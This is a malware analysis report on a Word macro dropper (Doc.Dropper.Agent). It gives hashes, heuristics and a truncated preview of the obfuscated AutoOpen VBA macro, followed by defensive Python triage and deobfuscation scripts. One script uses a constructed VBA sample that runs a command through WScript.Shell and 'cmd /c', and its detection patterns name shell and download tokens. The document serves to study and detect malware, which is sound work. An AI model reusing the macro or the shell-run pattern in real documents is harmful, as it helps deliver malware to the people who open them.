Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58f4ca331db447aa…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 192.5 KB
Created: 2018-03-05 20:58:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: b54d8616efca00a2f0db866bb796f799
SHA-1: 63cce75cbfc3f6e1d1091f57fe0589e4fafde38d
SHA-256: 58f4ca331db447aa2263e381e8f15e08d71e24a852d866916a9b9a1305cac056
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Office Word (OLE) document containing a malicious VBA macro. The recovered VBA project defines an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled, and it calls CreateObject, which instantiates arbitrary COM automation objects (shell, HTTP, filesystem and similar) and is the usual execution and download primitive in macro droppers. ClamAV matches the Doc.Dropper.Agent signature family, which classifies the document as a dropper: a macro that stages and executes a secondary payload (the "Agent" suffix is a generic family name, not an attribution to a specific campaign). The decoded source carved as macros.bas (65,846 bytes) is heavily obfuscated: junk arithmetic over undeclared variables under On Error Resume Next, short string fragments fed through a decoding helper, and 30 long base64-like blobs. Static analysis alone does not recover the payload or where it is fetched from; the only URL extracted is a standard Office schema namespace, not a network indicator.

Heuristics (8 findings)

  • ClamAV: Doc.Dropper.Agent-6464705-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464705-0.
  • VBA macros detected [medium] 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines AutoOpen, so the macro executes as soon as the document is opened with macros enabled.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, which instantiates arbitrary COM automation objects and is the usual way a macro dropper obtains a shell, an HTTP client or a file writer.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule text is generic: for this sample a modern VBA project was in fact recovered (macros.bas below) and it is that project's AutoOpen name the marker reflects, so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic macro.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace that Office writes into documents containing drawing content; it is not a network indicator, and no payload URL was recovered statically.
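The macro heuristics above (auto-exec entry point, CreateObject and other execution tokens, long base64-like blobs in the carved source) are simple enough to reproduce on decoded VBA text. The following script is an added example, not the report generator's or oletools' code: it runs the same classes of check over a constructed VBA excerpt written in the style of the preview below (identifiers, the blob contents and the WScript.Shell/Run pair are made up for the demo). On a real sample you would first obtain the decoded source with olevba, which is the extractor the artifact table names, and pass that text to triage().

```python
"""Source-level VBA triage mirroring the report's macro heuristics.
Added example, not the report generator's or oletools' code."""
import base64
import re

# Constructed sample: an AutoOpen entry point, junk arithmetic over
# undeclared variables, one long base64-like blob and a CreateObject/Run
# pair. Identifiers and the blob contents are made up for the demo.
_BLOB = base64.b64encode(b"constructed payload text for the demo only").decode()
SAMPLE_VBA = f'''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    On Error Resume Next
    PtKdZMcjCw
End Sub

Function PtKdZMcjCw()
    On Error Resume Next
    IOimbfw = "frKtOVGwm tes&&QFiwsQhUsWvwnMjGwSm"
    runqNP = 1875727 / Atn(pnkhNLN) / (6411634 - SNlDbDD / 6496754)
    zPayload = "{_BLOB}"
    Set oSh = CreateObject("WScript.Shell")
    oSh.Run "cmd /c " & zPayload, 0
End Function
'''

# Word/Excel auto-execution entry points, matched as Sub/Function names.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(Auto(?:Open|Exec|New|Close|Exit)|Document_(?:Open|Close|New)|"
    r"Workbook_(?:Open|Activate))\b", re.I | re.M)
# Object-creation, shell and download tokens: the same token classes the
# report's p-code heuristic keys on, here matched in decoded source.
EXEC_TOKENS_RE = re.compile(
    r"\b(CreateObject|GetObject|WScript\.Shell|ShellExecute|Shell|"
    r"URLDownloadToFile|XMLHTTP|ADODB\.Stream|powershell|Run|Exec)\b", re.I)
# Base64-alphabet runs too long to be ordinary identifiers.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def find_autoexec(src):
    return sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}, key=str.lower)


def find_exec_tokens(src):
    return sorted({m.group(1) for m in EXEC_TOKENS_RE.finditer(src)}, key=str.lower)


def find_base64_blobs(src):
    """Long base64-alphabet runs that also decode cleanly."""
    blobs = []
    for m in B64_RUN_RE.finditer(src):
        run = m.group(0)
        try:
            base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            blobs.append(run)
        except ValueError:  # binascii.Error is a ValueError
            pass
    return blobs


def triage(src):
    """Return findings as (rule id, severity, detail) in the report's style."""
    auto, toks, blobs = find_autoexec(src), find_exec_tokens(src), find_base64_blobs(src)
    findings = []
    if auto:
        findings.append(("OLE_VBA_AUTOOPEN", "high", "auto-exec: " + ", ".join(auto)))
    if any(t.lower() == "createobject" for t in toks):
        findings.append(("OLE_VBA_CREATEOBJ", "high", "CreateObject call"))
    if auto and toks:  # source-level analogue of OLE_VBA_PCODE_AUTOEXEC_EXEC
        findings.append(("VBA_AUTOEXEC_EXEC", "high", "auto-exec plus " + ", ".join(toks)))
    if blobs:
        findings.append(("EXTRACTED_FILE_STATIC_TRIAGE", "info",
                         f"{len(blobs)} long base64-like blob(s)"))
    return findings


if __name__ == "__main__":
    for rule, sev, detail in triage(SAMPLE_VBA):
        print(f"{sev:8} {rule:30} {detail}")
```

The base64 check decodes each candidate run with validate=True so that long but non-base64 identifier runs are not counted; the token list is deliberately short and should be extended with whatever your own p-code scanner keys on.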

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  65,846 bytes
SHA-256: 11303b3da91b9f17fb0659b1cf266525e8027de197b596537f0763e9914b2ab5
Detection
ClamAV: No threats found (the Doc.Dropper.Agent signature fires on the OLE container, not on the decoded source carved from it)
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Script preview
First 1,000 lines of the extracted script (the listing reproduced here is cut off partway through).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NYJXNQOOOMsfl"
Function PtKdZMcjCw()
On Error Resume Next
IOimbfw = "frKtOVGwm tes&&QFiwsQhUsWvwnMjGwSm"
runqNP = 1875727 / Atn(pnkhNLN) / (6411634 - SNlDbDD / 6496754 - Sqr(QrLLbzpj * CStr(NMfXCBNiLRQJK / Sgn(5454866 - CDate(2448966 / UznLJMrKYCSz * 5799923 * Sqr(lrhTAUh))))) + (LkpzslRIGPwaHC - 487255 / 3908564 / CLng(6600664)))
jIzNOm = 226281 / Atn(VzzjNAzjY) / (5449673 - csCYmDWMUFsPw / 635475 - Sqr(DEipN * CStr(wwMwLAbzsFtj / Sgn(2980359 - CDate(7448752 / XiQzzW * 6284894 * Sqr(cjCfMwvz))))) + (PFdtqcaCuPb - 9920963 / 9849967 / CLng(6732541)))
BtjDvwwziW = wibMARLCDaWv + dd333h3sd(IOimbfw, 14, 12)
zHGtpjoNoj = "ZRav%!=%8rav% teEmUXjoEH"
dHzhYXnB = 5031534 / Atn(YQXsZZoiwIhRL) / (346509 - nizvB / 873463 - Sqr(bhiIOYADJi * CStr(ZEcoPnrRc / Sgn(7828180 - CDate(9510954 / SLbPdlAF * 4831967 * Sqr(uopOQLPivwzt))))) + (zYzSJDjbpiRM - 9473408 / 7501517 / CLng(1752874)))
wRvhTl = 4438788 / Atn(IczoJowB) / (4416312 - CutwRZZdriS / 8167895 - Sqr(pJFKY * CStr(TYGLd / Sgn(8092919 - CDate(4350128 / zokARmXhhvfAn * 4482936 * Sqr(RtwSbJ))))) + (DdZzDHviPI - 8923273 / 6029334 / CLng(5564135)))
ORmfPh = QvfVSpPPShj + dd333h3sd(zHGtpjoNoj, 9, 14)
maiSSmcTd = "aPaWWCbdwkEsK% tes&&mLBpVZoSzitFtVIAwswKvJz"
tTJKOqvoBFd = 2741973 / Atn(NNujfaP) / (8355956 - iEzdNEbANwO / 8609215 - Sqr(DrqrujVMuS * CStr(TpUOODoaQrC / Sgn(4552942 - CDate(4881835 / UqKFz * 7557403 * Sqr(RkJDtnfjWVjmQJ))))) + (jNmJHockB - 3782924 / 3317393 / CLng(7989582)))
DlPQVNz = 5053195 / Atn(KGufhBFKKUPJu) / (8806077 - SlIswGwSp / 6149103 - Sqr(pzIjbwE * CStr(LOoHiITZDRuz / Sgn(8895951 - CDate(6695657 / iiIzdnN * 7684243 * Sqr(zWMFCa))))) + (REHhHdiajdhtA - 9134785 / 6591533 / CLng(3187208)))
iiInDD = GdBDdIbJiYOwO + dd333h3sd(maiSSmcTd, 24, 16)
ARoPdQw = "cTwjvDbEH !%6rivqtBmv"
HszThcq = 513823 / Atn(rbcApJc) / (7707303 - DNFtTfIwWQ / 2764215 - Sqr(GawoFHORNp * CStr(bciPcoDkaLiLRL / Sgn(6072995 - CDate(8467065 / KbOfo * 6734207 * Sqr(BdMkBNWQOPdR))))) + (QjJSjnQYOhcZ - 3043683 / 2318344 / CLng(1242326)))
iddrVH = 7360936 / Atn(TntwNzbTiN) / (7859063 - zBiOHmiR / 9203198 - Sqr(ASMnwkKlBQiowq * CStr(mChhzzabG / Sgn(3356310 - CDate(6198493 / LIZbViUmamaCr * 1784630 * Sqr(LYnIFrqUkzjwBZ))))) + (GVPqwccoJJcDz - 121535 / 5400216 / CLng(5791280)))
zWjwN = lZBTAa + dd333h3sd(ARoPdQw, 8, 5)
WOjHoOIfL = "iawfLXvVIIcv% tes&&uviBjnEHv"
wzKwHpLi = 3884975 / Atn(DqZAT) / (1170278 - iAtoP / 5511805 - Sqr(sbzzjtfmfRv * CStr(whoAtXdro / Sgn(1543186 - CDate(7743448 / MqYcWZJRWFk * 5409931 * Sqr(XwaUQLHEzJ))))) + (qzzQmlrk - 7598726 / 3082209 / CLng(7513935)))
ziVHjvZqcZk = 8573490 / Atn(DPFIizqz) / (2396409 - WbCWXwjcO / 6243500 - Sqr(mXZsil * CStr(zoNjDFR / Sgn(200109 - CDate(1032849 / ZwTVdccpjOTnHn * 4704053 * Sqr(ORsjPAO))))) + (zXJmXwFWrj - 652759 / 3124240 / CLng(2564549)))
qrnzvi = qzPDSIbCVopdl + dd333h3sd(WOjHoOIfL, 2, 16)
SVoRwU = "BdIKXFZKkOibBDzDU=%IWAwYIGo"
poUiwvjpPz = 1732557 / Atn(PkOlhEiddFbb) / (3141157 - Vcczii / 4297893 - Sqr(sYnsNCcZJoN * CStr(mrrzaIQldl / Sgn(5250437 - CDate(3199036 / kqNuWNaOjrqzpq * 6150316 * Sqr(DwnOo))))) + (dkcXWSkF - 1356583 / 9374849 / CLng(4433909)))
QHzwQRU = 9067659 / Atn(MOimbnNFzB) / (274278 - RkjZpnCIPMcS / 9929523 - Sqr(HibkuauMTmYJM * CStr(aOdjbmEiAf / Sgn(3456051 - CDate(1779357 / mOzmMnkj * 6721324 * Sqr(PGaqFQzAfa))))) + (iAisqNmZdv - 3630297 / 7070643 / CLng(1194167)))
EFABOnjhJP = IuwCuWvLhaLr + dd333h3sd(SVoRwU, 7, 9)
zTuok = "pDjNwOWBrGQJPXudvumlnnEzYj1rav%jwoiFpHGRR"
HsHOcclKz = 3832561 / Atn(iVuqwO) / (3994084 - DOBIJEumTaESC / 8006983 - Sqr(FbKnSoHjDmZi * CStr(aQsNPRKiv / Sgn(4207480 - CDate(4255814 / RMLrK * 297652 * Sqr(pioPn))))) + (CEvfwWkWXL - 667607 / 6562671 / CLng(8268411)))
QTUamqRtUV = 622760 / Atn(iEKFojAcvrs) / (7160044 - somAEnMM / 2841844 - Sqr(wzlht * CStr(IJTwU / Sgn(1976212 - C
... (truncated)
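The junk pattern visible in the preview is mechanical: every second line is a chain of Atn/Sqr/CDate arithmetic over undeclared variables whose result is never read (the errors it raises, such as division by zero, are swallowed by On Error Resume Next), and each live assignment is padded with an undeclared variable, which is Empty in VBA, added to a call of the decoding helper. That structure can be stripped automatically. The script below is an added example, not code from the page or from oletools; it runs on a constructed excerpt in the same style (identifiers and literals made up). The body of the real helper dd333h3sd is not shown on the page, so the script reports the surviving decoder calls with their string arguments rather than guessing at their semantics.

```python
"""Dead-assignment and Empty-padding stripper for junk-obfuscated VBA.
Added example, not the report generator's or oletools' code."""
import re

# Constructed excerpt in the style of the preview (names and literals are
# made up; dd333h3sd's body is not on the page). Live statements sit
# between arithmetic junk whose result is never used, and each live
# assignment is padded with an undeclared (Empty) variable.
SAMPLE_VBA = '''Function PtKdZMcjCw()
On Error Resume Next
IOimbfw = "frKtOVGwm tes&&QFiwsQhUsWvwnMjGwSm"
runqNP = 1875727 / Atn(pnkhNLN) / (6411634 - SNlDbDD / 6496754)
jIzNOm = 226281 / Atn(VzzjNAzjY) / (5449673 - csCYmDWMUFsPw / 635475)
BtjDvwwziW = wibMARLCDaWv + dd333h3sd(IOimbfw, 14, 12)
zHGtpjoNoj = "ZRav%!=%8rav% teEmUXjoEH"
dHzhYXnB = 5031534 / Atn(YQXsZZoiwIhRL) / (346509 - nizvB / 873463)
ORmfPh = QvfVSpPPShj + dd333h3sd(zHGtpjoNoj, 9, 14)
PtKdZMcjCw = BtjDvwwziW & ORmfPh
End Function
'''

ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
STR_RE = re.compile(r'"[^"]*"')
# helper(stringVar, n, m): the shape of the decoder calls in the preview
CALL_RE = re.compile(r"([A-Za-z_]\w*)\(\s*([A-Za-z_]\w*)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)")


def _idents(text):
    """Identifiers in a statement, ignoring the contents of string literals."""
    return set(IDENT_RE.findall(STR_RE.sub('""', text)))


def strip_dead_assignments(lines):
    """Drop assignments whose target is never read anywhere else. Iterates
    to a fixed point, since removing one dead line can orphan another."""
    live = list(lines)
    while True:
        reads = set()
        for ln in live:
            m = ASSIGN_RE.match(ln)
            reads |= _idents(m.group(2) if m else ln)
        kept = [ln for ln in live
                if not (ASSIGN_RE.match(ln) and ASSIGN_RE.match(ln).group(1) not in reads)]
        if len(kept) == len(live):
            return kept
        live = kept


def strip_empty_padding(lines):
    """Remove 'undeclaredVar + ' prefixes: a never-assigned VBA variable is
    Empty, and Empty + <string> evaluates to the string unchanged."""
    assigned = {m.group(1) for ln in lines for m in [ASSIGN_RE.match(ln)] if m}
    out = []
    for ln in lines:
        m = ASSIGN_RE.match(ln)
        if m:
            pad = re.match(r"([A-Za-z_]\w*)\s*\+\s*(.*)$", m.group(2))
            if pad and pad.group(1) not in assigned:
                ln = f"{m.group(1)} = {pad.group(2)}"
        out.append(ln)
    return out


def deobfuscate(src):
    """Return (cleaned source, decoder calls) where each call is
    (target, helper, fragment string, arg1, arg2)."""
    lines = strip_empty_padding(strip_dead_assignments(src.splitlines()))
    strings = {}
    for ln in lines:
        m = ASSIGN_RE.match(ln)
        if m:
            s = STR_RE.fullmatch(m.group(2).strip())
            if s:
                strings[m.group(1)] = s.group(0).strip('"')
    calls = []
    for ln in lines:
        m = ASSIGN_RE.match(ln)
        c = m and CALL_RE.search(m.group(2))
        if c and c.group(2) in strings:
            calls.append((m.group(1), c.group(1), strings[c.group(2)],
                          int(c.group(3)), int(c.group(4))))
    return "\n".join(lines), calls


if __name__ == "__main__":
    cleaned, calls = deobfuscate(SAMPLE_VBA)
    print(cleaned)
    for target, helper, frag, a, b in calls:
        print(f"{target} <- {helper}({frag!r}, {a}, {b})")
```

The read/write analysis is deliberately naive (no scoping, no control flow), which is enough for this style of junk because the padding variables are never assigned anywhere in the module; once the helper's body has been read from the full macros.bas, the recovered (fragment, n, m) triples are what you feed to a reimplementation of it.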